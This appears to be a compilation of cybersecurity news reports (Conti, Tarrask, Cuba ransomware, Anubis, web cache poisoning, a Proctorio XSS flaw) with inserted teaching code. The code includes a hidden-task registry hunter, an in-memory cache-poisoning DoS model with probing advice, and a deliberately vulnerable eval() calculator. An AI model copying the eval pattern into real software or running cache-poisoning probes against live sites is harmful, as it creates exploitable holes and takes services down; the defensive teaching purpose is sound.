
Conti Ransomware Shuts Down and Rebrands Itself

 

The Conti ransomware group has effectively put a stop to their operation by shutting down its infrastructure and informing its team leaders that the brand no longer exists. Advanced Intel's Yelisey Boguslavskiy tweeted that the gang's internal infrastructure had been shut down.

The Tor admin panels that members used to conduct negotiations and post "news" on the data leak site are down, according to BleepingComputer, although the public-facing 'Conti News' leak site and the ransom negotiation site are still reachable.

As per Bleeping Computer, "The agenda to conduct the attack on Costa Rica for the purpose of publicity instead of ransom was declared internally by the Conti leadership. Internal communications between group members suggested that the requested ransom payment was far below $1 million USD (despite unverified claims of the ransom being $10 million USD, followed by Conti’s own claims that the sum was $20 million USD)". 

Although the Conti ransomware brand has been retired, the cybercrime organisation will remain a significant player in the ransomware ecosystem for some time. Rather than rebranding as another large ransomware operation, Conti's leadership has teamed up with smaller ransomware gangs to carry out attacks.

The smaller gangs benefit from the alliance because they gain access to experienced Conti pentesters, negotiators, and operators. For the Conti syndicate, splitting into smaller "cells" that all answer to the central leadership improves its agility and its ability to evade law enforcement.

According to research published by Advanced Intel, Conti has worked with a wide range of well-known ransomware operations. Its current members, who include negotiators, intelligence analysts, pentesters, and coders, are now spread across several of these operations. Although they use the encryptors and negotiation sites of whichever operation they have joined, they remain part of the larger Conti criminal group.

Anonymous Hacks Russian Energy Companies, Leaking 1 Million+ Emails

 

Anonymous claims to have hacked Russian energy businesses and leaked their emails as part of its ongoing cyberwar against Russia in support of Ukraine. On Twitter, the hacker collective claimed to have exposed over 1 million emails from ALET, a Russian customs broker for gasoline and energy firms. 

The tweet stated, "NEW: #Anonymous hacked nearly 1.1 million emails (1.1 TB of data) from ALET, a Russian customs broker for companies in the fuel and energy industries, handling exports and customs declarations for coal, crude oil, liquefied gases and petroleum products."

DDoSecrets, an organisation co-founded by Emma Best and dedicated to comprehensive data transparency in the public interest, disclosed the breach. 

What is ALET? 

ALET is a customs broker based in Russia. It manages exports and customs declarations for petroleum products, coal, liquefied gases, and crude oil for enterprises in the fuel and energy industry. It has worked with 400 businesses and filed 119,000 customs declarations since 2011 with oil products accounting for the majority of its revenues. Gazprom, Gazprom Neft, and Bashneft have all recommended it.

Anonymous has threatened to fight a cyberwar against Putin since the start of the Russia-Ukraine conflict. So far, it has lived up to that promise. Not only has the organisation disclosed Russian information, but it has also infiltrated Russian organisations in order to inform citizens about what is happening outside the nation. 

Anonymous is best known for hacking Russian streaming sites and TV networks in order to show Russian residents what was going on in Ukraine. Last week, the group hacked Enerpred, Russia's largest hydraulic equipment manufacturer dealing in the energy, coal, gas, oil, and construction industries, and stole 645,000 emails (up to 432GB of data).

The company is headquartered in Irkutsk, the capital of Eastern Siberia, with offices in major Russian cities including Moscow and St. Petersburg. The leaked data is hosted on the DDoSecrets (Distributed Denial of Secrets) website.

All Organisations Must Report Cybersecurity Breaches Within 6 Hours: CERT-In

 

CERT-In, India's Computer Emergency Response Team, released new guidelines on Thursday mandating that service providers, intermediaries, data centres, corporate bodies, and government institutions report cybersecurity incidents, including data breaches, within six hours.

The government said in a release, "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents."

The types of incidents covered include compromise of critical systems, targeted scanning, unauthorised access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances such as routers and IoT devices.

The government stated it was taking these steps to ensure that the indicators of compromise (IoCs) associated with security events are readily available to "carry out the analysis, investigation, and coordination as per the process of the law".

The guidelines also require the organisations concerned to synchronise ICT system clocks to the National Informatics Centre (NIC) or National Physical Laboratory (NPL) Network Time Protocol (NTP) servers and to retain ICT system logs for a rolling period of 180 days, and require VPN service providers to keep subscriber data such as names, addresses, phone numbers, email addresses, and IP addresses for a minimum of five years.

The guidelines also require virtual asset service, exchange, and custodian wallet providers to preserve records on Know Your Customer (KYC) and financial transactions for a period of five years, starting in 60 days.

India's Ministry of Electronics and Information Technology (MeitY) said in a statement, "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

This New Malware Uses Windows Bugs to Conceal Scheduled Tasks

 

Microsoft has found new malware used by the Chinese state-backed Hafnium hacking group to create and hide scheduled tasks on compromised Windows machines in order to maintain persistence. 

Cyberespionage attacks by the Hafnium threat group have previously targeted US defence businesses, think tanks, and researchers. It's also one of the state-sponsored groups Microsoft has tied to the global exploitation of the ProxyLogon zero-day vulnerability, which affected all supported Microsoft Exchange versions last year. 

The Microsoft Detection and Response Team (DART) stated, "As Microsoft continues to track the high-priority state-sponsored threat actor HAFNIUM, new activity has been uncovered that leverages unpatched zero-day vulnerabilities as initial vectors. Further investigation reveals forensic artifacts of the usage of Impacket tooling for lateral movement and execution and the discovery of a defence evasion malware called Tarrask that creates 'hidden' scheduled tasks, and subsequent actions to remove the task attributes, to conceal the scheduled tasks from traditional means of identification." 

Tarrask hides the tasks from "schtasks /query" and from the Task Scheduler UI by deleting the task's Security Descriptor (SD) registry value, which Microsoft describes as a previously unknown Windows issue. 

By regularly re-establishing dropped connections to command-and-control (C2) infrastructure, the group kept access to infected devices even after reboots. The Hafnium operators could have deleted all on-disk artefacts, including the task's registry keys and the XML file written to the system folder, but doing so would have destroyed persistence across restarts, so only the SD value was removed. 

The "hidden" tasks can be found only by manually searching the Windows Registry for task keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree that have no SD (security descriptor) value. 

Admins can also watch for the relevant task-related events by enabling the Security and Microsoft-Windows-TaskScheduler/Operational event logs. Microsoft further recommends enabling 'TaskOperational' logging in the Microsoft-Windows-TaskScheduler/Operational log and monitoring outbound connections from critical Tier 0 and Tier 1 assets. 
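The registry check described above, written out as an added example (this is not Microsoft's or DART's code). It assumes that task keys live under the TaskCache\Tree path given above, that a genuine task key carries an Id value, and that Tarrask-style hiding leaves the key in place with only the SD value deleted. The sample entries at the bottom are constructed, not real forensic data. On a Windows host walk_tree() reads the live registry; the pure find_hidden_tasks() function can equally be fed entries exported from an offline SOFTWARE hive.

```python
"""Hunt for Tarrask-style hidden scheduled tasks (added example, not DART code).

Windows keeps one registry key per scheduled task under
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree.
A genuine task key carries an "Id" value (the task GUID) and an "SD" value
(its security descriptor; assumed here to be the only thing Tarrask removes).
A key that still has "Id" but no "SD" is the artefact to look for.
"""
try:
    import winreg  # Windows only; the analysis function below is pure Python
except ImportError:
    winreg = None

TREE_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"


def find_hidden_tasks(entries):
    """Return the task paths that have an Id value but no SD value.

    entries: iterable of (relative_key_path, {value_name: data}) for every
    key below Tree.  Folder keys such as "Microsoft\\Windows" carry no Id
    and are ignored; value names are compared case-insensitively because
    the registry itself is case-insensitive.
    """
    hidden = []
    for path, values in entries:
        names = {name.lower() for name in values}
        if "id" in names and "sd" not in names:
            hidden.append(path)
    return sorted(hidden)


def walk_tree(root=TREE_PATH):
    """Yield (relative_key_path, values) for every key below root via winreg."""
    if winreg is None:
        raise RuntimeError("winreg is unavailable: run this on the Windows host")

    def _walk(subkey, rel):
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            values, i = {}, 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:      # no more values
                    break
                values[name] = data
                i += 1
            if rel:                  # skip the Tree root itself
                yield rel, values
            j = 0
            while True:
                try:
                    child = winreg.EnumKey(key, j)
                except OSError:      # no more subkeys
                    break
                yield from _walk(subkey + "\\" + child, f"{rel}\\{child}".lstrip("\\"))
                j += 1

    yield from _walk(root, "")


# Constructed sample: two folder keys, one normal task, one Tarrask-style task.
SAMPLE_ENTRIES = [
    ("Microsoft", {}),
    ("Microsoft\\Windows", {}),
    ("Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     {"Id": "{11111111-2222-3333-4444-555555555555}", "Index": 3, "SD": b"\x01\x00\x04\x80"}),
    ("WinUpdate",  # hypothetical task name: Id and Index present, SD deleted
     {"Id": "{66666666-7777-8888-9999-000000000000}", "Index": 3}),
]

if __name__ == "__main__":
    entries = list(walk_tree()) if winreg else SAMPLE_ENTRIES
    for path in find_hidden_tasks(entries):
        print("task key without SD value (hidden from schtasks /query):", path)
```

Run it elevated on the suspect host, since the TaskCache keys are not fully readable by standard users. Each hit is worth correlating with Security event ID 4698 ("A scheduled task was created"), which records the task XML at creation time and survives the later deletion of the SD value.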

DART added, "The threat actors in this campaign used hidden scheduled tasks to maintain access to critical assets exposed to the internet by regularly re-establishing outbound communications with C&C infrastructure. We recognize that scheduled tasks are an effective tool for adversaries to automate certain tasks while achieving persistence, which brings us to raising awareness about this oft-overlooked technique."

SolarWinds Alerted About Attacks Targeting Web Help Desk Instances

 

SolarWinds alerted customers about attacks on Web Help Desk (WHD) instances exposed to the Internet and recommended removing them from publicly accessible infrastructure, most likely to prevent exploitation of a potential security flaw. WHD is helpdesk ticketing and IT inventory management software for businesses, intended to automate ticketing and IT asset management. 

SolarWinds stated, "A SolarWinds customer reported an external attempted attack on their instance of Web Help Desk (WHD) 12.7.5. The customer's endpoint detection and response (EDR) system blocked the attack and alerted the customer to the issue. In an abundance of caution, SolarWinds recommends all Web Help Desk customers whose WHD implementation is externally facing to remove it from your public (internet-facing) infrastructure until we know more." 

Customers who cannot remove WHD instances from Internet-accessible servers should install EDR software and monitor them for attack attempts. SolarWinds has not been able to reproduce the scenario and is working with the customer to analyse the report. 

A SolarWinds spokesperson told BleepingComputer, "We received a report from one customer about an attempted attack that was not successful. While we are investigating this matter, we have also alerted other customers about this potential issue out of an abundance of caution. At this point, we have no reason to believe other customers were impacted." 

Although SolarWinds did not specify what tools or tactics were used in the attack, there are at least four security flaws an attacker could use against an unpatched WHD instance: 
• Access Restriction Bypass Via Referrer Spoof - Business Logic Bypass Vulnerability (CVE-2021-32076) - Fixed in WHD 12.7.6 
• Enabled HTTP PUT & DELETE Methods (CVE-2021-35243) - Fixed in WHD 12.7.7 Hotfix 1 
• Hard-coded credentials allowing arbitrary HSQL queries execution (CVE-2021-35232) - Fixed in WHD 12.7.7 Hotfix 1 
• Sensitive Data Disclosure Vulnerability (CVE-2021-35251) - Fixed in WHD 12.7.8 

According to the CVE-2021-35251 advisory, attackers might use unsecured WHD instances to gain access to environmental details about the Web Help Desk installation, making the other three security flaws easier to exploit.

Wightlink Customers' Details Compromised in Cyber Attack

 

Wightlink, a UK ferry company, has been hit by a highly complex cyber-attack that may have exposed the personal information of "a small number of customers and staff." Wightlink stated that the incident, which occurred in February, affected certain back-office IT systems but not its ferry services, booking system, or website.

According to the company, law enforcement and the UK's Information Commissioner's Office (ICO) have been notified, since some individuals' personal data may have been exposed. Wightlink operates three routes between Hampshire on England's south coast and the Isle of Wight. The company says it carries 4.6 million passengers a year on more than 100 daily sailings.

Wightlink claimed in a statement received by The Daily Swig: “Unfortunately, despite Wightlink taking appropriate security measures, some of its back-office IT systems were affected by a cyber-attack last month. However, this criminal action has not affected Wightlink’s ferries and FastCats, which have continued to operate normally during and following the attack, nor were its booking system and website affected.” 

Wightlink said it engaged third-party cybersecurity experts to investigate and contain the incident as soon as it was detected. The operator said it was working with the South East Regional Organised Crime Unit in addition to reporting the incident to the ICO. 

The company stated, “Wightlink does not process or store payment card details for bookings. However, the investigation has identified a small number of customers and staff for whom other items of personal information may have been compromised during the incident.” 

Wightlink chief executive Keith Greenfield stated, “I would like to thank all my colleagues at Wightlink who responded quickly ensuring that the impact to customers was minimised and that cross-Solent travel and bookings were unaffected.”

Cuba Ransomware Hacked Microsoft Exchange Servers

 

The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. According to cybersecurity firm Mandiant, the group is tracked as UNC2596 and the ransomware itself as COLDDRAW. 

Cuba is the name by which the malware is most widely known. The operation began in late 2019 and, after a slow start, gained traction in 2020 and 2021. In December 2021 the FBI issued an advisory stating that the group had compromised 49 critical infrastructure organisations in the United States. According to Mandiant's new analysis, the operation predominantly targets the United States, followed by Canada. Since August 2021 the gang has been exploiting Microsoft Exchange vulnerabilities to deploy web shells, RATs, and backdoors and gain a foothold on target networks. 

"Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. 

Among the backdoors planted are Cobalt Strike and the NetSupport Manager remote access tool, although the group also uses its own tools, including Bughatch, Wedgecut (check.exe), and Burntcigar: 
  • Wedgecut comes in the form of an executable named “check.exe,” which is a reconnaissance tool that enumerates the Active Directory through PowerShell.
  • Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
  • Burntcigar is a utility that can terminate processes at the kernel level by exploiting a flaw in an Avast driver, which is included with the tool for a “bring your own vulnerable driver” attack.
Finally, Termite is a memory-only dropper that downloads and loads the payloads mentioned earlier. However, this tool has been seen in campaigns by a variety of threat groups, indicating that it is not exclusively utilised by Cuba threat actors. 

Threat actors use stolen account credentials obtained with the widely available Mimikatz and Wicker tools to elevate access. They then use Wedgecut to undertake network reconnaissance before using RDP, SMB, PsExec, and Cobalt Strike to move laterally. Bughatch is then loaded by Termite, followed by Burntcigar, which disables security tools and creates the foundation for data exfiltration and file encryption. For the exfiltration process, the Cuba gang does not use cloud services, instead transfers everything to its own private infrastructure. 

Changing Operations 

Cuba ransomware teamed up with spammers behind the Hancitor malware in May 2021 to get access to corporate networks via DocuSign phishing emails. Since then, Cuba's operations have shifted to focus on vulnerabilities in public-facing services, such as the Microsoft Exchange ProxyShell and ProxyLogon flaws. Because security updates to fix the exploited vulnerabilities have been available for months, this move makes the assaults more potent but also easier to prevent. 

Once there are no more valuable targets running unpatched Microsoft Exchange servers, the Cuba operation will likely shift its focus to other vulnerabilities. This means that adopting accessible security updates as soon as they are released by software providers is critical in maintaining a strong security posture against even the most sophisticated threat actors.

UK Foreign Office Suffered ‘Serious Cyber Security Incident’

 

A "serious incident" compelled the Foreign Office of the United Kingdom to seek immediate cybersecurity assistance, as confirmed by a recently released public tender document. According to the document, published on February 4, the Foreign, Commonwealth and Development Office (FCDO) sought "urgent business support" from its cybersecurity contractor, BAE Applied Intelligence. 

The FCDO paid the company £467,325.60 — about $630,000 — for its services after issuing a contract for "business analyst and technical architect support to assess an authority cyber security incident" on January 12, 2022, according to the notice. However, the incident's facts, which had not previously been made public, remain unknown. 

The document stated, “The Authority was the target of a serious cyber security incident, details of which cannot be disclosed. In response to this incident, urgent support was required to support remediation and investigation. Due to the urgency and criticality of the work, the Authority was unable to comply with the time limits for the open or restricted procedures or competitive procedures with negotiation.” 

The Stack was the first to report on the BAE contract. An FCDO spokesperson, who did not give their name, said the office does not comment on security matters but has measures in place to detect and protect against potential cyber incidents. The spokesperson declined to answer further questions, such as whether classified information was accessed. 

TechCrunch also contacted the United Kingdom's data protection authority to see if the event had been reported, but is yet to hear back. The announcement of the apparent incident came only days after the British Council, an institution that specialises in international cultural and educational opportunities, was found to have suffered a severe security breach. Clario researchers discovered 144,000 unencrypted files on an unsecured Microsoft Azure storage server, including the personal and login information of British Council students. 

In December 2020, Wilton Park, a Sussex-based executive agency of the FCDO, disclosed a cyberattack; an investigation by the UK's National Cyber Security Centre found that the attackers had had access to the agency's systems for six years, though there was no evidence that data had been stolen.

Over 40 Billion Records Exposed in 2021

 

According to Tenable's analysis of 1,825 breach incidents publicised between November 2020 and October 2021, at least 40,417,167,937 records were exposed globally in 2021. That is up from 730 publicly announced incidents, exposing just over 22 billion records, over the same period in 2020. 

Organizations can efficiently prioritize security operations to stop attack paths and protect key systems and assets by studying threat actor behavior. Many of the events investigated for this research can be easily mitigated by fixing legacy flaws and fixing misconfigurations, which can help limit attack routes. 

In 2021, ransomware had a huge impact on businesses, accounting for about 38% of all data breaches, and unsecured cloud databases were responsible for a further 6%. Unpatched SSL VPNs remain an ideal entry point for cyberespionage, exfiltration of sensitive and proprietary data, and network-wide encryption. 

Threat groups, particularly ransomware, have been progressively exploiting Active Directory flaws and misconfigurations. When security controls and code audits are not in place, software libraries and network stacks that are frequently utilized among OT devices might create additional threats. 

Cyberespionage operations used the software supply chain to acquire sensitive data, whereas ransomware groups preferred physical supply chain disruption as a technique to extract payment. Data breaches wreaked havoc on the healthcare and education sectors the most. 

Claire Tills, Senior Research Engineer, Tenable stated, “Migration to cloud platforms, reliance on managed service providers, software and infrastructure as a service have all changed how organizations must think about and secure the perimeter.”  

“Modern security leaders and practitioners must think more holistically about the attack paths that exist within their networks and how they can efficiently disrupt them. By examining threat actor behaviour we can understand which attack paths are the most fruitful and leverage these insights to define an effective security strategy. ” 

Patching assets is hard enough given the sheer number of vulnerabilities disclosed, but in 2021 it became harder still because of partial patches, vendor miscommunication, and patch bypasses. 

There were 21,957 common vulnerabilities and exposures (CVEs) reported in 2021, up 19.6% from 18,358 in 2020 and 241% more than the 6,447 declared in 2016. The number of CVEs increased at an average yearly percentage growth rate of 28.3 percent from 2016 to 2021.

$50 Million Lost to Fraudsters Impersonating Broker-Dealers

 

A California man admitted his involvement in a large-scale and long-running Internet-based fraud scam that allowed him and other fraudsters to drain about $50 million from hundreds of investors.

Between 2012 and October 2020 Allen Giltman, 56, and his co-conspirators constructed phoney websites to collect money from people via the internet by advertising various investment opportunities (mainly the purchase of certificates of deposit). 

According to court documents, "The Fraudulent Websites advertised higher than average rates of return on the CDs, which enhanced the attractiveness of the investment opportunities to potential victims. At times, the fraudulent websites were designed to closely resemble websites being operated by actual, well-known, and publicly reputable financial institutions; at other times, the fraudulent websites were designed to resemble legitimate-seeming financial institutions that did not exist." 

They advertised the phoney investment sites in Google and Microsoft Bing search results for phrases like "best CD rates" and "highest cd rates." The scammers pretended to be FINRA broker-dealers in interactions with victims seeking investment possibilities, claiming to be employed by the financial companies they imitated on the scam sites. 

To mask their identities during the scheme, they used virtual private networks (VPNs), prepaid gift cards to register web domains, prepaid phones and encrypted messaging applications to communicate with their targets, and false invoices to explain the large wire transfers they received from victims. 

"To date, law enforcement has identified at least 150 fraudulent websites created as part of the scheme," the Justice Department stated. 

"At least 70 victims of the fraud scheme nationwide, including in New Jersey, collectively transmitted approximately $50 million that they believed to be investments." 

The wire fraud conspiracy charge to which Giltman pleaded guilty carries a maximum sentence of 20 years in prison; the securities fraud charge carries a maximum of five years. Each is also punishable by a fine of $250,000 or twice the gross gain or loss from the offence, whichever is greater. Giltman is scheduled to be sentenced on May 10, 2022. 

Stay Vigilant

In July 2021 the FBI's Criminal Investigative Division and the Securities and Exchange Commission warned investors that scammers were impersonating registered financial professionals such as brokers and investment advisers. 

The July alert came after FINRA issued a similar fraud alert the same week regarding broker imposter frauds involving phishing sites that impersonate brokers and faked SEC or FINRA registration documents. 

"Fraudsters may falsely claim to be registered with the Securities and Exchange Commission (SEC), the Financial Industry Regulatory Authority (FINRA) or a state securities regulator in order to lure investors into scams, or even impersonate real investment professionals who actually are registered with these organizations," the FBI and SEC stated. 

Investors should first use the Investor.gov search engine to see if people marketing investment possibilities are licensed or registered, and then ensure they're not scammers by contacting the seller using independently confirmed contact information from the firm's Client Relationship Summary (Form CRS).

Researcher Detects 70 Web Cache Poisoning Vulnerabilities, Gets $40k in bug bounty rewards

 

Despite the fact that it is a well-known and well-documented vulnerability, 'web cache poisoning' continues to be a concern on the internet. 

Security researcher Iustin Ladunca (Youstin) recently uncovered 70 cache poisoning vulnerabilities with varying implications after conducting a thorough investigation on different websites, including some high-traffic online services. 

The intermediate storage points between web servers and client devices, such as point-of-presence servers, proxies, and load balancers, are the targets of web cache poisoning attacks. These intermediates aid website speed by keeping local versions of online content and delivering them to web clients faster. Cache poisoning attacks change the way cache servers behave and respond to certain URL requests from clients. 

Ladunca told The Daily Swig, “I started researching web cache poisoning back in November 2020, shortly after reading James Kettle’s extensive research on the topic. Only a few weeks in, I discovered two novel cache poisoning vulnerabilities, which made me realize just how wide the attack surface for cache poisoning is.” 

In a blog post, Ladunca outlined how he identified and disclosed the web cache vulnerabilities, which affected servers and services including Apache Traffic Server, GitHub, GitLab, HackerOne, and Cloudflare, among others. 

“A common pattern was caching servers configured to only cache static files, meaning attacks were limited to static files only,” Ladunca stated.

“Even so, there still was a significant impact, since modern websites rely heavily on JS [JavaScript] and CSS [cascading style sheets] and taking those files down would really affect application availability.” 

Several of the web cache vulnerabilities enabled denial of service (DoS). Cache servers use the URL and certain headers as the key under which responses are stored and retrieved; other headers are unkeyed, meaning they are forwarded to the origin but ignored when matching cache entries. By sending malformed values in unkeyed headers, Ladunca could make the origin return an error response, which the cache then stored and served instead of the original content, leaving the target URLs unreachable for clients. 

“In terms of techniques used, by far the most common one was CP-DoS through unkeyed headers, which probably accounted for 80% of [the] total findings,” Ladunca said. 

Other web cache poisoning flaws could be leveraged for cross-site scripting (XSS). One, for example, could make the cache server fetch JavaScript file requests from an attacker-controlled IP address. In another case, Ladunca was able to redirect a cached request from one host to another host that was vulnerable to DOM-based XSS. 

For the 70 web cache vulnerabilities he uncovered, Ladunca received a bug bounty of roughly $40,000. He did, however, learn some valuable lessons about safeguarding web cache servers. 

“I would say a good way to secure CDNs from cache poisoning attacks would be disabling caching for error status codes, a mitigation which should stop a large part of CP-DoS attacks,” he said. 
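A model of the CP-DoS mechanism described above and of the mitigation just quoted, as an added example (not Ladunca's code, nor that of any affected vendor). Everything is in memory and constructed: a toy origin, a cache that keys only on the URL, and an attacker request. The choice of X-Forwarded-Host as the unkeyed header and the origin's 400 on an oversized value are assumptions made for illustration; the article does not say which headers or status codes were involved in specific findings. The Cache class shows the two defences side by side: refusing to store error responses, and folding the header into the cache key so the attacker's response lands in its own slot.

```python
"""CP-DoS through an unkeyed header, modelled in memory (added example).

A cache serves any later request whose *cache key* matches a stored entry.
If the key is only the URL, a header that the origin reacts to but the
cache ignores (an "unkeyed" header) can make the origin produce an error
that is then stored and replayed to every other client of that URL.
"""
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    body: str


def origin(path, headers):
    """Toy origin.  It trusts X-Forwarded-Host (assumed unkeyed) to build
    URLs and answers 400 when the value is unusable: the "malformed value
    in an unkeyed header" behaviour the article relies on."""
    host = headers.get("x-forwarded-host", "www.example.com")
    if len(host) > 64 or "/" in host:
        return Response(400, "Bad Request")
    if path.endswith(".js"):
        return Response(200, f"// application script served for {host}")
    return Response(404, "Not Found")


class Cache:
    """Cache in front of origin().

    cache_errors:  weak setting: store 4xx/5xx like any other response.
    keyed_headers: header names folded into the cache key (empty = unkeyed).
    """

    def __init__(self, cache_errors=True, keyed_headers=()):
        self.cache_errors = cache_errors
        self.keyed_headers = tuple(h.lower() for h in keyed_headers)
        self.store = {}
        self.origin_hits = 0  # how often the origin was actually contacted

    def _key(self, path, headers):
        return (path,) + tuple(headers.get(h, "") for h in self.keyed_headers)

    def get(self, path, headers=None):
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        key = self._key(path, headers)
        if key in self.store:
            return self.store[key]
        self.origin_hits += 1
        resp = origin(path, headers)
        if resp.status < 400 or self.cache_errors:
            self.store[key] = resp
        return resp


def poison_then_visit(cache, path="/static/app.js"):
    """Attacker sends one request with a bad unkeyed header value; an
    ordinary client then asks for the same URL.  Returns the status the
    victim sees (400 means the static file is now unavailable to everyone)."""
    cache.get(path, {"X-Forwarded-Host": "a" * 200})   # attacker
    return cache.get(path).status                       # victim


if __name__ == "__main__":
    print("errors cached, header unkeyed :", poison_then_visit(Cache()))
    print("errors not cached             :", poison_then_visit(Cache(cache_errors=False)))
    print("header folded into cache key  :",
          poison_then_visit(Cache(keyed_headers=["X-Forwarded-Host"])))
```

Against a real target the attacker's probe is normally sent with a throwaway cache-buster query parameter, so that a poisoned error response lands on a key nobody else uses; omit it and a single test request takes the asset down for real users, which is exactly the impact described above.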

The researcher also recommended PortSwigger's Param Miner, an open-source tool for finding hidden, unlinked parameters. Run against a web application, Param Miner can surface unkeyed headers that could be used for web cache poisoning.

Anubis Trojan Targeted 400 Banks’ Customers

 

A malicious app disguised as the official account management portal for French telecom giant Orange S.A. is targeting customers of Chase, Wells Fargo, Bank of America, and Capital One, as well as almost 400 other financial institutions. 

According to researchers, this is only the beginning. Researchers at Lookout cautioned in a recent report that once downloaded, the malware - a version of banking trojan Anubis – collects the user's personal data and uses it to mislead them. And it's not just huge bank customers that are at risk, according to the researchers: Crypto wallets and virtual payment networks are also being targeted.

The Lookout report stated, “As a banking trojan malware, Anubis’ goal is to collect significant data about the victim from their mobile device for financial gain.”

“This is done by intercepting SMSs, keylogging, file exfiltration, screen monitoring, GPS data collection, and abuse of the device’s accessibility services.” 

The malicious version of the Orange Telecom account management software was uploaded to the Google Play store in July 2021 and then removed, but analysts believe this was only a test of Google's antivirus defences and that it could reappear shortly. 

The report added, “We found that obfuscation efforts were only partially implemented within the app and that there were additional developments still occurring with its command-and-control (C2) server. We expect more heavily obfuscated distributions will be submitted in the future.” 

New Anubis Tricks 

The banking trojan connects to the command-and-control (C2) server after being downloaded on the device and downloads another application to start the SOCKS5 proxy. 

“This proxy allows the attacker to enforce authentication for clients communicating with their server and mask communications between the client and C2. Once retrieved and decrypted, the APK is saved as ‘FR.apk’ in ‘/data/data/fr.orange.serviceapp/app_apk,'” the researchers stated.

The user is then prompted to disable Google Play Protect, giving the attacker complete control, according to the research. Banks, reloadable card businesses, and cryptocurrency wallets are among the 394 apps targeted by fr.orange.serviceapp, according to the researchers. 

The Anubis client was linked back to a half-completed crypto trading platform, according to the Lookout team. 

Anubis, which was first discovered in 2016, is freely available as open-source code on underground forums, along with instructions for budding banking trojan criminals, according to the research. 

According to Lookout, the basic banking trojan has added a credential stealer to the mix in this current edition of Anubis code, putting logins for cloud-based platforms like Microsoft 365 in danger. 

As per Kristina Balaam, a security researcher with Lookout, the Lookout team was unable to discover any successful attacks linked to the Orange S.A. campaign. 

“While we can’t be certain whether the app has been used in a successful attack, we do know they are targeting U.S. banks including Bank of America, U.S. Bank, Capital One, Chase, SunTrust and Wells Fargo,” Balaam stated.

A Flaw in an Anti-Cheating Browser Extension Could Have Let Hackers into University Computers

 

A web security vulnerability in an anti-cheating browser extension could have given attackers a way into the machines of college students and other users before it was fixed. 

Security researchers at Sector 7, the research arm of Dutch security firm Computest, identified a cross-site scripting (XSS) bug in the Proctorio Google Chrome extension. Proctorio is proctoring software, which has come into its own during the pandemic as a way to deter cheating in online assessments. 

The technology has been widely used in the Netherlands, much to the annoyance of local student organizations, which have unsuccessfully challenged its use as a privacy risk. Concerns were raised because the extension can read and modify data on websites visited by users, as well as take screenshots and monitor webcam footage. 

“This [vulnerability] could be used by a malicious page to access data on any site where the user is currently logged in, for example, read all your email,” Sector7 told The Daily Swig. 

“And it could be used to access features like the webcam if the user has granted any website permission to use it.” 

According to Sector7's technical write-up, the problem lay in the Proctorio extension's implementation of an 'open calculator' feature. Because the calculator is attached to the DOM of the page on which Proctorio is active, JavaScript on that page can enter an expression into the calculator and then trigger its evaluation, the researchers said. 

This lets the website run code inside the extension's content script. From the content script's scope, the page can then send messages to the extension's background page, which treats them as legitimate messages from the content script. The researchers found that a combination of such messages let them trigger universal XSS (uXSS). 

Sector7 told The Daily Swig: “[The] root cause [of the vulnerability] was evaluating untrusted JavaScript originating from a webpage in the extension, leading to universal cross-site scripting.” 
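To make that root cause concrete, here is an added illustrative example, not Proctorio's own code and not Sector7's proof of concept. `unsafeCalculate` shows the pattern the write-up describes (a content script handing a page-supplied expression to `eval`), and `safeCalculate` is a hardened replacement that only understands arithmetic, so page text can never become code. The function names and the payload string are the example's own assumptions.

```javascript
// Added example, not the extension's code: a content-script calculator that
// evaluates an expression taken from the page DOM.

// Vulnerable pattern: the string comes from the web page. A page that writes
// "1+1; <arbitrary JS>" into the calculator runs that JS with the content
// script's privileges, crossing the page/extension isolation boundary.
function unsafeCalculate(expr) {
  return eval(String(expr));
}

// Hardened version: a small recursive-descent evaluator for numbers,
// + - * / and parentheses. Anything else is rejected; no eval, no Function().
function safeCalculate(expr) {
  const tokens = tokenize(String(expr));
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];

  function parseExpr() {            // expr := term (('+'|'-') term)*
    let value = parseTerm();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const rhs = parseTerm();
      value = op === '+' ? value + rhs : value - rhs;
    }
    return value;
  }
  function parseTerm() {            // term := factor (('*'|'/') factor)*
    let value = parseFactor();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const rhs = parseFactor();
      if (op === '/' && rhs === 0) throw new Error('division by zero');
      value = op === '*' ? value * rhs : value / rhs;
    }
    return value;
  }
  function parseFactor() {          // factor := number | '(' expr ')' | '-' factor
    const tok = next();
    if (tok === undefined) throw new Error('unexpected end of expression');
    if (typeof tok === 'number') return tok;
    if (tok === '(') {
      const value = parseExpr();
      if (next() !== ')') throw new Error('missing )');
      return value;
    }
    if (tok === '-') return -parseFactor();
    throw new Error(`unexpected token ${tok}`);
  }

  const result = parseExpr();
  if (pos !== tokens.length) throw new Error('trailing input');
  return result;
}

// Tokenizer: only digits, decimal points, operators and parentheses survive.
function tokenize(src) {
  const tokens = [];
  let i = 0;
  while (i < src.length) {
    const ch = src[i];
    if (ch === ' ') { i++; continue; }
    if ('+-*/()'.includes(ch)) { tokens.push(ch); i++; continue; }
    const m = /^\d+(\.\d+)?/.exec(src.slice(i));
    if (!m) throw new Error(`illegal character ${JSON.stringify(ch)}`);
    tokens.push(Number(m[0]));
    i += m[0].length;
  }
  return tokens;
}

console.log(safeCalculate('2*(3+4)'));   // 14
```

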